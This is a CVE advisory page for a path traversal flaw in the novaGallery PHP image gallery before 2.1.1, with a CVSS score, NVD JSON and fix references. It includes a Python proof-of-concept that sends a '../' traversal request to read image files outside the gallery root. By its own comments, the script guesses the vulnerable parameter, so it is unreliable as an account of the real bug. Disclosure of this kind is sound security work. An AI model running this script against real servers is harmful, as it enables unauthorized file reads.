Security Vulnerability Report
中文
CVE-2026-42028 CVSS 5.3 MEDIUM

CVE-2026-42028

Published: 2026-05-08 17:16:31
Last Modified: 2026-05-08 18:16:34
Source: [email protected]

Description

novaGallery is a php image gallery. Prior to version 2.1.1, a path traversal vulnerability has been identified in novaGallery. This allows unauthenticated users to read image files outside the intended gallery root directory. This issue has been patched in version 2.1.1.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

novaGallery < 2.1.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests def exploit(target_url): # The vulnerable parameter might vary, assuming 'file' or 'image' based on description # Payload attempts to traverse out of the web root traversal_payload = "../../../tmp/sensitive_image.jpg" # Construct the full URL # Example: http://target.com/novagallery/index.php?file=../../../tmp/sensitive_image.jpg attack_url = f"{target_url}/index.php?file={traversal_payload}" try: response = requests.get(attack_url, timeout=5) if response.status_code == 200: print("[+] Request sent successfully.") print("[+] Checking if file content was leaked...") # Check for image header or specific content to verify success if b"JFIF" in response.content or b"PNG" in response.content: print("[!] Vulnerability Confirmed: Image file read successfully.") print(f"[+] Content Length: {len(response.content)} bytes") else: print("[-] Response received, but content does not look like an image.") else: print(f"[-] Exploit failed. HTTP Status Code: {response.status_code}") except Exception as e: print(f"[-] Error occurred: {str(e)}") if __name__ == "__main__": target = "http://127.0.0.1/novagallery" # Replace with actual target exploit(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-42028", "sourceIdentifier": "[email protected]", "published": "2026-05-08T17:16:31.177", "lastModified": "2026-05-08T18:16:33.827", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "novaGallery is a php image gallery. Prior to version 2.1.1, a path traversal vulnerability has been identified in novaGallery. This allows unauthenticated users to read image files outside the intended gallery root directory. This issue has been patched in version 2.1.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}]}], "references": [{"url": "https://github.com/novafacile/novagallery/commit/46fe7b0f79f429e18c8cff3f92360c4513732ba6", "source": "[email protected]"}, {"url": "https://github.com/novafacile/novagallery/releases/tag/v2.1.1", "source": "[email protected]"}, {"url": "https://github.com/novafacile/novagallery/security/advisories/GHSA-wv5j-98c7-frm9", "source": "[email protected]"}, {"url": "https://github.com/novafacile/novagallery/security/advisories/GHSA-wv5j-98c7-frm9", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.